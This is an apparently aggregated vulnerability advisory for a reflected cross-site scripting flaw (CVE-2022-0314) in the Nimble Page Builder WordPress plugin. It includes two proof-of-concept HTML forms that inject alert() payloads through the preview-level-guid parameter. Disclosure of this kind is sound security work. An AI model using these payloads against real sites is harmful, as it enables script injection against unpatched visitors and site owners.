Lucene search
Krzysztof ZającWPEX-ID:17585F16-C62C-422D-AD9C-9138B6DA97B7HistoryMar 29, 2022 - 12:00 a.m.
Nimble Page Builder < 3.2.2 - Reflected Cross-Site Scripting
2022-03-2900:00:00
Krzysztof Zając
80
0.001 Low
EPSS
Percentile
40.2%
The plugin does not sanitise and escape the preview-level-guid parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
v < 3.1.32
<form action="http://example.com/?customize_messenger_channel" method="POST">
<input type="text" name="preview-level-guid" value='" xxx><img src onerror=alert(/XSS/)>'>
<input type="submit" value="Exploit me pls" />
</form>
v < 3.2.2
<form action="http://example.com/?customize_messenger_channel" method="POST">
<input type="text" name="preview-level-guid" value='" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//'>
<input type="submit" value="Exploit me pls" />
</form>Related
patchstack
patchstack
nvd
nvd
CVE-2022-0314
2022-04-11 15:15:08
cvelist
cvelist
CVE-2022-0314 Nimble Page Builder < 3.2.2 - Reflected Cross-Site Scripting
2022-04-11 14:40:43
cve
cve
CVE-2022-0314
2022-04-11 15:15:08
wpvulndb
wpvulndb
Nimble Page Builder < 3.2.2 - Reflected Cross-Site Scripting
2022-03-29 00:00:00
prion
prion
Cross site scripting
2022-04-11 15:15:00